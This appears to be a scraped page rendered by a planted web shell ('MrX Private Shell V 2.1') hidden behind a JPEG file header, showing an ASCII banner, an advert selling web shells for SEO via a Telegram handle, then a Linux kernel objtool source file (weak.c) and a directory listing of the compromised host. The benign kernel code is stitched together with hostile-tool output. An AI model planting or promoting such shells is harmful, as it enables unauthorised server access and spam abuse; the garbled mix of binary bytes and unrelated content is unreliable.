����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
// SPDX-License-Identifier: GPL-2.0-or-later
/*
* Copyright (C) 2020 Matt Helsley <mhelsley@vmware.com>
* Weak definitions necessary to compile objtool without
* some subcommands (e.g. check, orc).
*/
#include <stdbool.h>
#include <errno.h>
#include <objtool/objtool.h>
#define UNSUPPORTED(name) \
({ \
fprintf(stderr, "error: objtool: " name " not implemented\n"); \
return ENOSYS; \
})
int __weak orc_dump(const char *_objname)
{
UNSUPPORTED("ORC");
}
int __weak orc_create(struct objtool_file *file)
{
UNSUPPORTED("ORC");
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| arch | Folder | 0755 |
|
|
| include | Folder | 0755 |
|
|
| Build | File | 762 B | 0644 |
|
| Makefile | File | 1.99 KB | 0644 |
|
| builtin-check.c | File | 7.54 KB | 0644 |
|
| check.c | File | 107.67 KB | 0644 |
|
| elf.c | File | 31.85 KB | 0644 |
|
| fixdep | File | 14.12 KB | 0755 |
|
| objtool | File | 203.52 KB | 0755 |
|
| objtool.c | File | 1.76 KB | 0644 |
|
| orc_dump.c | File | 4.18 KB | 0644 |
|
| orc_gen.c | File | 5.79 KB | 0644 |
|
| special.c | File | 4.04 KB | 0644 |
|
| sync-check.sh | File | 1.28 KB | 0755 |
|
| weak.c | File | 558 B | 0644 |
|